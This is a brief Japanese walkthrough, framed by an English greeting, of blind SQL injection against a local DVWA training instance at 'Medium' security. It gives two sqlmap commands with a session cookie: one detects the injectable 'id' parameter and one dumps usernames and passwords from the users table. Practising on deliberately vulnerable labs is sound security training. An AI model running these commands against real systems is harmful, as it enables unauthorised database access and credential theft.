Hello there,
セキュリティレベルを『Medium』へ。
動作を確認してみて。
Burp Suiteからクッキー情報を取り出して。
下記のようにsqlmapを実行すると。
idについて、脆弱性が検出されて。
sqlmap -u "http://172.17.0.2/vulnerabilities/sqli_blind/#" --cookie="PHPSESSID=06nsu44nk0h52rmfmqdgbrdpq1; security=medium" --data "id=5&Submit=Submit" -p id
さらには、以下のようにsqlmapにパラメータを追加して実行すると。
パスワードを抜き出すことができた。
sqlmap -u "http://172.17.0.2/vulnerabilities/sqli_blind/#" --cookie="PHPSESSID=06nsu44nk0h52rmfmqdgbrdpq1; security=medium" --data "id=5&Submit=Submit" -p id -D dvwa -T users -C user,password --dump
Best regards,
